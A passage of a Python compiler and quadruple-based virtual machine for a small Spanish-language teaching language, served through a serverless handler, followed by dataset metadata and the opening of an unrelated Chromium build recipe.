tipo_parametros.append(p[-1])\n temporal_var[0] = p[-1]\n\ndef p_r_update_func_type(p):\n 'r_update_func_type : '\n fun_dict.add_function(temporal_var[0])\n\ndef p_r_register_quad(p):\n 'r_register_quad : '\n fun_dict.add_quadruple(len(cuadruplos))\n\ndef p_r_era_funcion_void(p):\n 'r_era_funcion_void : '\n # guardar nombre de la función llamada\n pila_operadores.append(\"FUNC\")\n nombre_func = p[-3]\n pila_nombre_func.append(nombre_func)\n func = fun_dict.search_function(nombre_func)\n\n if func:\n if func.type == \"void\":\n global apuntador_argumento\n cuad = Quadruple('era',None,None,nombre_func)\n cuadruplos.append(cuad)\n if apuntador_argumento > -1:\n pila_apuntador_argumentos.append(apuntador_argumento)\n #pila_tipos_argumentos.append(tipos_argumentos)\n if len(tipos_argumentos)> 0:\n apuntador_argumento = 0\n else:\n raise Exception(\"La función \" + nombre_func + \" tiene tipo de retorno\")\n\n else:\n raise Exception(\"La función \" + nombre_func + \" no ha sido declarada\")\n\ndef p_r_era_funcion_retorno(p):\n 'r_era_funcion_retorno : '\n # guardar nombre de la función llamada\n pila_operadores.append(\"FUNC\")\n nombre_func = pila_guardar_variable[-1]\n pila_nombre_func.append(nombre_func)\n func = fun_dict.search_function(nombre_func)\n if func:\n if func.type != \"void\":\n global apuntador_argumento\n cuad = Quadruple('era',None,None,nombre_func)\n cuadruplos.append(cuad)\n if apuntador_argumento > -1:\n pila_apuntador_argumentos.append(apuntador_argumento)\n if len(tipos_argumentos)> 0:\n apuntador_argumento = 0\n else:\n raise Exception(\"La función \" + nombre_func + \" es de tipo void\")\n\n else:\n raise Exception(\"La función \" + nombre_func + \" no ha sido declarada\")\n\ndef p_r_asegurar_return(p):\n 'r_asegurar_return : '\n global flag_return\n if flag_return == False:\n raise Exception(\"No se regresó ningún valor para la función \" + fun_dict.curr_function.name)\n\n else:\n flag_return = False\n\n pass\n\ndef p_r_terminar_parametro(p):\n 'r_terminar_parametro : '\n global apuntador_argumento\n global tipos_argumentos\n global temporal_int\n pila_operadores.pop()\n nombrefunc = pila_nombre_func.pop()\n num_quad = fun_dict.search_quad(nombrefunc)\n cuad = Quadruple('gosub',None,None,num_quad)\n cuadruplos.append(cuad)\n if apuntador_argumento != -1:\n if apuntador_argumento < len(tipos_argumentos):\n raise Exception(\"Faltan argumentos en la llamada a la función\")\n else:\n if len(pila_apuntador_argumentos) > 0:\n apuntador_argumento = pila_apuntador_argumentos.pop()\n else:\n apuntador_argumento = -1\n if len(pila_tipos_argumentos) > 0:\n tipos_argumentos = pila_tipos_argumentos.pop()\n else:\n tipos_argumentos = []\n\ndef p_r_terminar_parametro_void(p):\n 'r_terminar_parametro_void : '\n global apuntador_argumento\n global tipos_argumentos\n global temporal_int\n pila_operadores.pop()\n nombrefunc = pila_nombre_func.pop()\n num_quad = fun_dict.search_quad(nombrefunc)\n cuad = Quadruple('gosub',None,None,num_quad)\n cuadruplos.append(cuad)\n if apuntador_argumento != -1:\n if apuntador_argumento < len(tipos_argumentos):\n raise Exception(\"Faltaron argumentos a la llamada de funcion\")\n else:\n if len(pila_apuntador_argumentos) > 0:\n apuntador_argumento = pila_apuntador_argumentos.pop()\n else:\n apuntador_argumento = -1\n if len(pila_tipos_argumentos) > 0:\n tipos_argumentos = pila_tipos_argumentos.pop()\n else:\n tipos_argumentos = []\n\ndef p_r_extraer_parametro(p):\n 'r_extraer_parametro : '\n global apuntador_argumento\n if apuntador_argumento < len(tipos_argumentos) and len(tipos_argumentos) > 0 :\n resultado = pila_operandos.pop()\n if tipos_argumentos[apuntador_argumento] == 'int':\n cuad = Quadruple('parameter',resultado,None,\"parameter\" + str(apuntador_argumento) )\n cuadruplos.append(cuad)\n apuntador_argumento+=1\n elif tipos_argumentos[apuntador_argumento] == 'float':\n cuad = Quadruple('parameter',resultado,None,\"parameter\"+str(apuntador_argumento))\n cuadruplos.append(cuad)\n apuntador_argumento+=1\n else:\n raise Exception(\"el tipo de argumento no es del tipo del parametro\")\n else:\n raise Exception(\"La funcion no tiene ese numero de parametros\")\n\ndef p_r_verifica_void(p):\n 'r_verifica_void : '\n global tipos_argumentos\n global pila_tipos_argumentos\n func = fun_dict.search_function(p[-1])\n if func:\n if func.type == \"void\":\n tipos_argumentos_defunc = fun_dict.search_existing_name(p[-1])\n if apuntador_argumento >= 0:\n pila_tipos_argumentos.append(tipos_argumentos)\n tipos_argumentos = tipos_argumentos_defunc\n if tipos_argumentos == -1:\n raise Exception(\"Error, la variable no está declarada en ningún contexto \" + p[-1])\n pass\n\n else:\n raise Exception(\"La función llamada no es de tipo void\")\n\ndef p_r_marcar_funcion(p):\n 'r_marcar_funcion : '\n global tipo_funcion\n tipo_funcion = 1\n\ndef p_r_desmarcar_funcion(p):\n 'r_desmarcar_funcion : '\n global tipo_funcion\n global tipo_parametros\n tipo_funcion = 0\n e = fun_dict.add_typesofparameter(tipo_parametros)\n tipo_parametros = []\n\n\ndef p_r_endfunc(p):\n 'r_endfunc : '\n cuad = Quadruple('endfunc',None,None,None)\n cuadruplos.append(cuad)\n #guardar el tamaño se lo que funcion size.append([lo que uso ])\n\ndef p_r_if_paso_1(p):\n 'r_if_paso_1 : '\n #preguntar el tipo si el operando es boolano\n result = pila_operandos.pop()\n cuad = Quadruple('gotof', result, None,None)\n cuadruplos.append(cuad)\n pila_saltos.append(len(cuadruplos)-1)\n\ndef p_r_register_variable_name(p):\n 'r_register_variable_name : '\n global global_int\n global local\n global global_float\n temporal_var[1] = p[-1]\n if temporal_var[0] == \"int\":\n if fun_dict.curr_function.name == \"global\":\n fun_dict.append_variable_to_curr_function(temporal_var[1], temporal_var[0], global_int)\n global_int += 1\n else:\n fun_dict.append_variable_to_curr_function(temporal_var[1], temporal_var[0], local)\n local += 1\n\n fun_dict.curr_function.int_spaces += 1\n\n\n elif temporal_var[0] == \"float\":\n if fun_dict.curr_function.name == \"global\":\n fun_dict.append_variable_to_curr_function(temporal_var[1], temporal_var[0], global_float)\n global_float += 1\n\n else:\n fun_dict.append_variable_to_curr_function(temporal_var[1], temporal_var[0], local)\n local += 1\n\n fun_dict.curr_function.float_spaces += 1\n\n\n else:\n raise Exception(\"El tipo de dato especificado, no existe \" + temporal_var[0])\n \ndef p_r_arr_dim_uno(p):\n 'r_arr_dim_uno : '\n global dimension_uno\n global flag_dim_uno\n dimension_uno = p[-2]\n if dimension_uno == 0:\n raise Exception(\"La dimension de la variable \" + temporal_var[1]+ \" no puede ser 0\")\n flag_dim_uno = True\n\ndef p_r_arr_dim_dos(p):\n 'r_arr_dim_dos : '\n global dimension_dos\n global flag_dim_dos\n dimension_dos = p[-2]\n if dimension_dos == 0:\n raise Exception(\"La dimension de la variable \" + temporal_var[1]+ \" no puede ser 0\")\n flag_dim_dos = True\n\ndef p_r_verify_array(p):\n 'r_verify_array : '\n global global_int\n global local\n global global_float\n global flag_dim_uno\n global flag_dim_dos\n if flag_dim_uno == True and flag_dim_dos == True:\n fun_dict.add_dim_two(temporal_var[1],dimension_uno,dimension_dos)\n espacios = dimension_uno * dimension_dos\n if temporal_var[0] == \"int\":\n if fun_dict.curr_function.name == \"global\":\n global_int += espacios - 1\n else:\n local += espacios - 1\n fun_dict.curr_function.int_spaces += espacios - 1\n elif temporal_var[0] == \"float\":\n if fun_dict.curr_function.name == \"global\":\n global_float += espacios - 1\n else:\n local += espacios - 1\n fun_dict.curr_function.float_spaces += espacios - 1\n elif flag_dim_uno == True and flag_dim_dos == False:\n fun_dict.add_dim_one(temporal_var[1],dimension_uno)\n espacios = dimension_uno\n if temporal_var[0] == \"int\":\n if fun_dict.curr_function.name == \"global\":\n global_int += espacios - 1\n else:\n local += espacios - 1\n fun_dict.curr_function.int_spaces += espacios - 1\n elif temporal_var[0] == \"float\":\n if fun_dict.curr_function.name == \"global\":\n global_float += espacios - 1\n else:\n local += espacios - 1\n fun_dict.curr_function.float_spaces += espacios - 1\n flag_dim_uno = False\n flag_dim_dos = False\n\ndef p_r_verifica_variable_existe(p):\n 'r_verifica_variable_existe : '\n global tipos_argumentos\n global pila_tipos_argumentos\n var, e = fun_dict.curr_function.vars.search(p[-1])\n if not var:\n # search in global\n func = fun_dict.search_function(\"global\")\n if func:\n var, e = func.vars.search(p[-1])\n if not var:\n tipos_argumentos_defunc = fun_dict.search_existing_name(p[-1])\n if apuntador_argumento >= 0:\n pila_tipos_argumentos.append(tipos_argumentos)\n tipos_argumentos = tipos_argumentos_defunc\n if tipos_argumentos == -1:\n raise Exception(\"la variable no está declarada en ningún contexto \" + p[-1])\n pass\n\ndef p_r_verifica_arrexp_uno(p):\n 'r_verifica_arrexp_uno : '\n global pointers\n global temporal_int\n global constant_int\n name_var = pila_guardar_variable.pop()\n var = fun_dict.get_variable(name_var)\n\n pila_operadores.pop()\n if var[\"dim_uno\"] == None:\n raise Exception(\"La variable \" + name_var + \" no es un arreglo\")\n elif (\"dim_uno\" in var and var[\"dim_uno\"] != None) and (\"dim_dos\" in var and var[\"dim_dos\"] == None):\n index = pila_operandos.pop()\n tipo_var = pila_tipos.pop()\n if tipo_var != \"int\":\n raise Exception(\"La expresion tiene que ser de tipo entero\")\n \n l_limit = const_table.insert_constant(0, \"int\", constant_int)\n if l_limit == constant_int:\n constant_int += 1\n\n u_limit = const_table.insert_constant(var[\"dim_uno\"], \"int\", constant_int)\n if u_limit == constant_int:\n constant_int += 1\n\n quad = Quadruple('ver',index,l_limit,u_limit)\n\n cuadruplos.append(quad)\n quad = Quadruple('+_',index,var[\"virtual_address\"],pointers)\n cuadruplos.append(quad)\n pila_tipos.append(var[\"type\"])\n pila_operandos.append(pointers)\n pila_guardar_variable.append(\"tipo arreglo\")\n pointers+=1\n elif (\"dim_uno\" in var and var[\"dim_uno\"] != None) and (\"dim_dos\" in var and var[\"dim_dos\"] != None):\n pila_guardar_variable.append(name_var)\n pila_guardar_variable.append(\"tipo matriz\")\n \n index = pila_operandos.pop()\n tipo_var = pila_tipos.pop()\n if tipo_var != \"int\":\n raise Exception(\"La expresion tiene que ser de tipo entero\")\n\n l_limit = const_table.insert_constant(0, \"int\", constant_int)\n if l_limit == constant_int:\n constant_int += 1\n\n u_limit = const_table.insert_constant(var[\"dim_uno\"], \"int\", constant_int)\n if u_limit == constant_int:\n constant_int += 1\n\n quad = Quadruple('ver',index,l_limit,u_limit)\n cuadruplos.append(quad)\n\n quad = Quadruple('*_',index,var[\"dim_dos\"],temporal_int)\n cuadruplos.append(quad)\n pila_tipos.append(\"int\")\n pila_operandos.append(temporal_int)\n temporal_int+=1\n\ndef p_r_verifica_arrexp_dos(p):\n 'r_verifica_arrexp_dos : '\n global pointers\n global temporal_int\n global constant_int\n pila_operadores.pop()\n verifica = pila_guardar_variable.pop()\n if (verifica == \"tipo arreglo\"):\n raise Exception(\"La variable no es una matriz\")\n name_var = pila_guardar_variable.pop()\n var = fun_dict.get_variable(name_var)\n if (\"dim_uno\" in var and var[\"dim_uno\"] != None) and (\"dim_dos\" in var and var[\"dim_dos\"] != None):\n pila_guardar_variable.append(\"tipo arreglo\")\n index = pila_operandos.pop()\n tipo_var = pila_tipos.pop()\n if tipo_var != \"int\":\n raise Exception(\"La expresion tiene que ser de tipo entero\")\n\n l_limit = const_table.insert_constant(0, \"int\", constant_int)\n if l_limit == constant_int:\n constant_int += 1\n\n u_limit = const_table.insert_constant(var[\"dim_dos\"], \"int\", constant_int)\n if u_limit == constant_int:\n constant_int += 1\n\n quad = Quadruple('ver',index,l_limit,u_limit)\n cuadruplos.append(quad)\n temporal_index = pila_operandos.pop()\n pila_tipos.pop()\n quad = Quadruple('+',temporal_index,index,temporal_int)\n cuadruplos.append(quad)\n quad = Quadruple('+_',temporal_int,var[\"virtual_address\"],pointers)\n cuadruplos.append(quad)\n temporal_int+=1\n pila_tipos.append(var[\"type\"])\n pila_operandos.append(pointers)\n pointers+=1\n\n\ndef p_r_return_func(p):\n 'r_return_func : '\n global flag_return\n flag_return = True\n result = pila_operandos.pop()\n tipo = pila_tipos.pop()\n if tipo == fun_dict.curr_function.type:\n space = fun_dict.search_global(fun_dict.curr_function.name + '_func')[\"virtual_address\"]\n cuad = Quadruple('return',space, None,result)\n cuadruplos.append(cuad)\n\n else:\n curr_func = fun_dict.curr_function\n raise Exception(\"Error, la función \" + curr_func.name + \" es de tipo \" + curr_func.type + \" y el retorno de tipo \" + tipo)\n\ndef p_r_if_paso_2(p):\n 'r_if_paso_2 : '\n cuad = Quadruple('goto',None, None,None)\n cuadruplos.append(cuad)\n salto = pila_saltos.pop()\n pila_saltos.append(len(cuadruplos)-1)\n cuadruplos[salto].modificar_resultado(len(cuadruplos))\n\ndef p_r_if_paso_3(p):\n 'r_if_paso_3 : '\n salto = pila_saltos.pop()\n cuadruplos[salto].modificar_resultado(len(cuadruplos))\n\ndef p_r_while_paso_1(p):\n 'r_while_paso_1 : '\n pila_saltos.append(len(cuadruplos))\n\ndef p_r_while_paso_2(p):\n 'r_while_paso_2 : '\n #preguntar el tipo si el operando es boolano\n resultado = pila_operandos.pop()\n cuad = Quadruple('gotof', resultado, None,None)\n pila_saltos.append(len(cuadruplos))\n cuadruplos.append(cuad)\n\ndef p_r_while_paso_3(p):\n 'r_while_paso_3 : '\n #preguntar el tipo si el operando es boolano\n salto_al_final = pila_saltos.pop()\n salto_al_regreso = pila_saltos.pop()\n cuad = Quadruple('goto', None, None,salto_al_regreso)\n cuadruplos.append(cuad)\n cuadruplos[salto_al_final].modificar_resultado(len(cuadruplos))\n\ndef p_r_pop_igu_for(p):\n 'r_pop_igu_for : '\n operando_der = pila_operandos.pop()\n operando_izq = pila_operandos.pop()\n tipo_der = pila_tipos.pop()\n tipo_izq = pila_tipos.pop()\n operator = pila_operadores.pop()\n res_type = semantic_cube[tipo_izq][tipo_der][operator]\n if tipo_der == \"int\" and tipo_izq == \"int\":\n cuad = Quadruple(operator,operando_der,None ,operando_izq)\n #verifica que el tipo se tal (ESTE TIPO,-1)\n #verifica que sea del tipo igual a\n pila_operandos.append(operando_izq)\n pila_tipos.append('int')\n cuadruplos.append(cuad)\n\n else:\n raise Exception(\"Los dos operandos deben ser enteros\")\n\ndef p_r_for_paso_1(p):\n 'r_for_paso_1 : '\n global temporal_bool\n valor_limite = pila_operandos.pop()\n valor_de_comp = pila_operandos.pop()\n #verificar que valor limite sea int\n pila_saltos.append(len(cuadruplos))\n cuad = Quadruple('<',valor_de_comp,valor_limite,temporal_bool)\n pila_operandos.append(valor_de_comp)\n pila_tipos.append('int') \n #pila_operandos.append((0,len(tabla_temporales)))\n #tabla_temporales.append((-1,-1))\n cuadruplos.append(cuad)\n #guardar salto del gotof\n pila_saltos.append(len(cuadruplos))\n #resultado_gotof = pila_operandos.pop()\n cuad2 = Quadruple('gotof',temporal_bool,None,None)\n temporal_bool += 1\n cuadruplos.append(cuad2)\n\ndef p_r_for_paso_2(p):\n 'r_for_paso_2 : '\n resultado = pila_operandos.pop()\n #guardar constante 1\n global constant_int\n global temporal_int\n insertion = const_table.insert_constant(1, 'int', constant_int)\n if insertion != constant_int:\n cuad = Quadruple('+',insertion,resultado,temporal_int)\n\n else:\n cuad = Quadruple('+',constant_int,resultado,temporal_int)\n constant_int += 1\n\n cuadruplos.append(cuad)\n cuadasignacion = Quadruple('=',temporal_int,None,resultado)\n temporal_int += 1\n cuadruplos.append(cuadasignacion)\n gotof = pila_saltos.pop()\n retorno = pila_saltos.pop()\n cuadgoto = Quadruple('goto',None,None,retorno)\n cuadruplos.append(cuadgoto)\n cuadruplos[gotof].modificar_resultado(len(cuadruplos))\n\ndef p_r_guardar_variable(p):\n 'r_guardar_variable : '\n pila_guardar_variable.append(p[-2])\n\ndef p_r_pila_operandos_push(p):\n 'r_pila_operandos_push : '\n global temporal_float\n global temporal_int\n\n oper = pila_guardar_variable.pop()\n if oper != \"tipo matriz\":\n if oper != \"tipo arreglo\":\n var = fun_dict.get_variable(oper)\n if var:\n if (\"dim_uno\" in var and var[\"dim_uno\"] == None) and (\"dim_dos\" in var and var[\"dim_dos\"] == None):\n pila_operandos.append(var['virtual_address'])\n pila_tipos.append(var[\"type\"])\n else:\n raise Exception(\"La variable tiene dimensiones\")\n else:\n funcion = fun_dict.search_function(oper)\n if not funcion:\n raise Exception(\"El identificador \" + oper + \" no existe\")\n\n else:\n return_type = funcion.type\n if return_type == \"float\":\n new_quad = Quadruple('=', oper, None, temporal_float)\n pila_operandos.append(temporal_float)\n pila_tipos.append(\"float\")\n temporal_float += 1\n\n else:\n func = fun_dict.search_global(oper + \"_func\")\n new_quad = Quadruple('=', func[\"virtual_address\"], None, temporal_int)\n pila_operandos.append(temporal_int)\n pila_tipos.append(\"int\")\n temporal_int += 1\n\n cuadruplos.append(new_quad)\n \n else:\n raise Exception(\"Error, la variable debe ser matriz\")\n \n\ndef p_r_pila_operandos_push_id(p):\n 'r_pila_operandos_push_id : '\n oper = pila_guardar_variable.pop()\n if oper != \"tipo matriz\":\n if oper != \"tipo arreglo\":\n var = fun_dict.get_variable(oper)\n if var:\n pila_operandos.append(var['virtual_address'])\n pila_tipos.append(var[\"type\"])\n else:\n raise Exception(\"Error, la variable \" + p[-2] + \" no existe\")\n else:\n raise Exception(\"Error, La variable debe ser matriz\")\n\ndef p_r_pila_operandos_push_cte_int(p):\n 'r_pila_operandos_push_cte_int : '\n # guardar la constant en la direccion de memoria - Tener en que direcion de memoria la gua\n global constant_int\n insertion = const_table.insert_constant(p[-1], 'int', constant_int)\n if insertion != constant_int:\n pila_operandos.append(insertion)\n\n else:\n pila_operandos.append(constant_int)\n constant_int += 1\n\n pila_tipos.append('int')\n tabla_temporales.append(('int', p[-1]))\n\ndef p_r_pila_operandos_push_cte_flt(p):\n 'r_pila_operandos_push_cte_flt : '\n global constant_float\n pila_operandos.append(constant_float)\n insertion = const_table.insert_constant(p[-1], 'float', constant_float)\n if insertion != constant_float:\n pila_operandos.append(insertion)\n\n else:\n pila_operandos.append(constant_float)\n constant_float += 1\n\n pila_tipos.append('float')\n tabla_temporales.append(('float', p[-1]))\n\ndef p_r_pop_mult(p):\n 'r_pop_mult : '\n if len(pila_operadores) > 0:\n if(pila_operadores[len(pila_operadores) - 1] == '*' or pila_operadores[len(pila_operadores) - 1] == '/'):\n operando_der = pila_operandos.pop()\n operando_izq = pila_operandos.pop()\n tipo_der = pila_tipos.pop()\n tipo_izq = pila_tipos.pop()\n operator = pila_operadores.pop()\n res_type = semantic_cube[tipo_izq][tipo_der][operator]\n\n if res_type != \"Error\":\n global temporal_float\n global temporal_int\n global temporal_bool\n \n #verifica que el tipo se tal (ESTE TIPO,-1)\n if res_type == 'float':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_float)\n pila_operandos.append(temporal_float)\n temporal_float += 1\n fun_dict.curr_function.temporal_float_spaces += 1\n\n elif res_type == 'int':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_int)\n pila_operandos.append(temporal_int)\n temporal_int += 1\n fun_dict.curr_function.temporal_int_spaces += 1\n\n elif res_type == 'bool':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_bool)\n pila_operandos.append(temporal_bool)\n temporal_bool += 1\n fun_dict.curr_function.temporal_bool_spaces += 1\n\n\n pila_tipos.append(res_type)\n tabla_temporales.append((-1,-1))\n cuadruplos.append(cuad)\n\n else:\n raise Exception(\"Error, la combinación de tipos no es compatible \" + tipo_izq + ' ' + operator + ' ' + tipo_der)\n\ndef p_r_pop_mas(p):\n 'r_pop_mas : '\n if len(pila_operadores) > 0:\n if(pila_operadores[len(pila_operadores) - 1] == '+' or pila_operadores[len(pila_operadores) - 1] == '-'):\n operando_der = pila_operandos.pop()\n operando_izq = pila_operandos.pop()\n tipo_der = pila_tipos.pop()\n tipo_izq = pila_tipos.pop()\n operator = pila_operadores.pop()\n res_type = semantic_cube[tipo_izq][tipo_der][operator]\n\n if res_type != \"Error\":\n global temporal_float\n global temporal_int\n global temporal_bool\n \n #verifica que el tipo se tal (ESTE TIPO,-1)\n if res_type == 'float':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_float)\n pila_operandos.append(temporal_float)\n temporal_float += 1\n fun_dict.curr_function.temporal_float_spaces += 1\n\n\n elif res_type == 'int':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_int)\n pila_operandos.append(temporal_int)\n temporal_int += 1\n fun_dict.curr_function.temporal_int_spaces += 1\n\n elif res_type == 'bool':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_bool)\n pila_operandos.append(temporal_bool)\n temporal_bool += 1\n fun_dict.curr_function.temporal_bool_spaces += 1\n\n\n pila_tipos.append(res_type)\n tabla_temporales.append((-1,-1))\n cuadruplos.append(cuad)\n\n else:\n raise Exception(\"Error, la combinación de tipos no es compatible \" + tipo_izq + ' ' + operator + ' ' + tipo_der)\ndef get_type(tupla):\n # Temporal\n if tupla[0] == 0:\n return tabla_temporales[tupla[1]]\n\n else:\n return fun_dict.curr_function.vars[tupla[1]]\n\ndef p_r_push_arr(p):\n 'r_push_arr : '\n pila_operadores.append(\"arreglo\")\n\ndef p_r_genera_escribe(p):\n 'r_genera_escribe : '\n cuad = Quadruple(\"write\", None, None, pila_operandos.pop())\n pila_tipos.pop()\n cuadruplos.append(cuad)\n\ndef p_r_genera_lectura(p):\n 'r_genera_lectura : '\n cuad = Quadruple(\"read\", None, None, pila_operandos.pop())\n pila_tipos.pop()\n cuadruplos.append(cuad)\n\n\ndef p_r_genera_escribe_string(p):\n 'r_genera_escribe_string : '\n global constant_string\n\n insertion = const_table.insert_constant(p[-1], 'string',constant_string)\n \n if insertion != constant_string:\n cuad = Quadruple(\"write\", None, None, insertion)\n\n else:\n cuad = Quadruple(\"write\", None, None, constant_string)\n constant_string += 1\n\n cuadruplos.append(cuad)\n\ndef p_r_pop_comp(p):\n 'r_pop_comp : '\n if len(pila_operadores) > 0:\n if(pila_operadores[len(pila_operadores) - 1] in comp_set):\n operando_der = pila_operandos.pop()\n operando_izq = pila_operandos.pop()\n tipo_der = pila_tipos.pop()\n tipo_izq = pila_tipos.pop()\n operator = pila_operadores.pop()\n res_type = semantic_cube[tipo_izq][tipo_der][operator]\n if res_type != \"Error\":\n global temporal_float\n global temporal_int\n global temporal_bool\n \n #verifica que el tipo se tal (ESTE TIPO,-1)\n if res_type == 'float':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_float)\n pila_operandos.append(temporal_float)\n temporal_float += 1\n fun_dict.curr_function.temporal_float_spaces += 1\n\n elif res_type == 'int':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_int)\n pila_operandos.append(temporal_int)\n temporal_int += 1\n fun_dict.curr_function.temporal_int_spaces += 1\n\n elif res_type == 'bool':\n cuad = Quadruple(operator, operando_izq, operando_der,temporal_bool)\n pila_operandos.append(temporal_bool)\n temporal_bool += 1\n fun_dict.curr_function.temporal_bool_spaces += 1\n\n\n pila_tipos.append(res_type)\n tabla_temporales.append((-1,-1))\n cuadruplos.append(cuad)\n\n else:\n raise Exception(\"Error, la combinación de tipos no es compatible \" + tipo_izq + ' ' + operator + ' ' + tipo_der)\n\n\ndef p_r_pop_igu(p):\n 'r_pop_igu : '\n if len(pila_operadores) > 0:\n if(pila_operadores[len(pila_operadores) - 1] == '='):\n operando_der = pila_operandos.pop()\n operando_izq = pila_operandos.pop()\n tipo_der = pila_tipos.pop()\n tipo_izq = pila_tipos.pop()\n operator = pila_operadores.pop()\n res_type = semantic_cube[tipo_izq][tipo_der][operator]\n\n if res_type != \"Error\":\n cuad = Quadruple(operator, operando_der, None, operando_izq)\n cuadruplos.append(cuad)\n\n else:\n raise Exception(\"Error, la combinación de tipos no es compatible \" + tipo_izq + ' ' + operator + ' ' + tipo_der)\n\ndef p_r_marcar_fondo_de_pila(p):\n 'r_marcar_fondo_de_pila : '\n pila_operadores.append(\"(\")\n\ndef p_r_desmarcar_fondo_de_pila(p):\n 'r_desmarcar_fondo_de_pila : '\n while pila_operadores[-1] != \"(\":\n if pila_operadores[-1] == \"*\" or pila_operadores[-1] == \"/\":\n p_r_pop_mult(-1)\n elif pila_operadores[-1] == \"+\" or pila_operadores[-1] == \"-\":\n p_r_pop_mas(-1)\n else:\n p_r_pop_comp(-1)\n pila_operadores.pop()\n\ndef p_r_pila_operadores_push_mult(p):\n 'r_pila_operadores_push_mult : '\n pila_operadores.append('*')\n\ndef p_r_pila_operadores_push_div(p):\n 'r_pila_operadores_push_div : '\n pila_operadores.append('/')\n\ndef p_r_pila_operadores_push_mas(p):\n 'r_pila_operadores_push_mas : '\n pila_operadores.append('+')\n\ndef p_r_pila_operadores_push_menos(p):\n 'r_pila_operadores_push_menos : '\n pila_operadores.append('-')\n\ndef p_r_pila_operadores_push_may(p):\n 'r_pila_operadores_push_may : '\n pila_operadores.append('>')\n\ndef p_r_pila_operadores_push_men(p):\n 'r_pila_operadores_push_men : '\n pila_operadores.append('<')\n\ndef p_r_pila_operadores_push_dif(p):\n 'r_pila_operadores_push_dif : '\n pila_operadores.append('!=')\n\ndef p_r_pila_operadores_push_iguigu(p):\n 'r_pila_operadores_push_iguigu : '\n pila_operadores.append(\"==\")\n\ndef p_r_pila_operadores_push_and(p):\n 'r_pila_operadores_push_and : '\n pila_operadores.append('&')\n\ndef p_r_pila_operadores_push_or(p):\n 'r_pila_operadores_push_or : '\n pila_operadores.append('|')\n\ndef p_r_pila_operadores_push_igu(p):\n 'r_pila_operadores_push_igu : '\n pila_operadores.append('=')\n\ndef p_r_pila_operadores_push_mayigu(p):\n 'r_pila_operadores_push_mayigu : '\n pila_operadores.append('>=')\n\ndef p_r_pila_operadores_push_menigu(p):\n 'r_pila_operadores_push_menigu : '\n pila_operadores.append('<=')\n\ndef p_r_push_fondo_falso(p):\n 'r_push_fondo_falso : '\n pila_operandos.append(\"(\")\n pila_tipos.append(\"(\")\n\ndef p_r_vaciar_fondo_falso(p):\n 'r_vaciar_fondo_falso : '\n pass\n\n# Arreglos\ndef p_r_register_dim(p):\n 'r_register_dim : '\n pass\n\n\n\ndef print_quads():\n for i,cuad in enumerate(cuadruplos):\n print(i, cuad.operador, cuad.operando_izq, cuad.operando_der, cuad.resultado)\n\ndef compile(program):\n global cuadruplos\n global const_table\n global fun_dict\n cuadruplos = []\n const_table = Constanttable()\n fun_dict = FunctionsDirectory()\n parser = yacc.yacc()\n parser.parse(program)\n print_quads()\n return cuadruplos, const_table\n\noperations = Operations()\n\n\nop_list = {\n \"goto\" : operations.goto,\n \"gotof\" : operations.goto_false,\n \"+\" : operations.plus_op,\n \"+_\" : operations.plus_op_esp,\n \"*_\": operations.mult_op_esp,\n \"-\" : operations.minus_op,\n \"*\" : operations.mult_op,\n \"/\" : operations.div_op,\n \"==\" : operations.eq_op,\n \"&\" : operations.and_op,\n \"|\" : operations.or_op,\n \"!=\" : operations.not_eq_op,\n \">=\" : operations.greater_eq_op,\n \"<=\" : operations.less_qp_op,\n \">\" : operations.greater_op,\n \"<\" : operations.less_op,\n \"=\" : operations.asignation,\n 'write': operations.write,\n 'era': operations.era,\n 'parameter': operations.param,\n 'gosub': operations.gosub,\n 'return': operations.return_val,\n 'read' : operations.read,\n 'endfunc' : operations.endfunc,\n 'ver': operations.ver\n}\n\ndef execute(quads, const_table):\n instruction_pointer = 0\n operations.load_constants(const_table)\n res = \"\"\n exceptions = {\"ver\", \"write\"}\n\n while instruction_pointer < len(quads):\n if quads[instruction_pointer].operador == \"gosub\":\n new_quad_number = op_list[quads[instruction_pointer].operador](quads[instruction_pointer], instruction_pointer)\n\n\n else:\n new_quad_number = op_list[quads[instruction_pointer].operador](quads[instruction_pointer])\n if quads[instruction_pointer].operador == \"write\":\n if new_quad_number:\n res += str(new_quad_number) + '\\n'\n\n else:\n raise Exception(\"Error, no puedes acceder a una variable/casilla a la que no has asignado valor\")\n\n elif quads[instruction_pointer].operador == \"ver\":\n if new_quad_number == False:\n raise Exception(\"Error, índice fuera de rango\") \n\n \n if new_quad_number and quads[instruction_pointer].operador not in exceptions:\n instruction_pointer = new_quad_number\n\n else:\n instruction_pointer += 1\n\n return res\n\n\ndef main(event, context):\n restart_variables()\n body = json.loads(event[\"body\"])\n programa = body[\"program\"]\n output = []\n\n try:\n quads, const_table = compile(programa)\n quads_list = []\n\n for quad in quads:\n quads_list.append([quad.operador, quad.operando_izq, quad.operando_der, quad.resultado])\n\n if not input_included:\n # go check if we will need an input at some point\n output, needs_input = execute(quads, const_table.table)\n if(needs_input):\n response = {\n \"statusCode\": 202,\n \"body\": json.dumps({\n \"output\":output,\n })\n }\n\n else:\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps({\n \"output\":output,\n })\n }\n\n else:\n output, needs_input = execute(quads, const_table.table, body[\"input\"])\n if(needs_input):\n response = {\n \"statusCode\": 202,\n \"body\": json.dumps({\n \"output\":output,\n })\n }\n\n else:\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps({\n \"output\":output,\n })\n }\n \n \n except Exception as e:\n print(e)\n response = {\n \"statusCode\": 300,\n \"body\": str(e)\n }\n\n\n return response\n\n # Use this code if you don't use the http event with the LAMBDA-PROXY\n # integration\n \"\"\"\n return {\n \"message\": \"Go Serverless v1.0! Your function executed successfully!\",\n \"event\": event\n }\n \"\"\"\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":47904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"584069590","text":"# Copyright 2016 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport re\n\nDEPS = [\n 'goma',\n 'recipe_engine/platform',\n 'recipe_engine/properties',\n 'recipe_engine/step',\n]\n\ndef RunSteps(api):\n api.goma.ensure_goma()\n 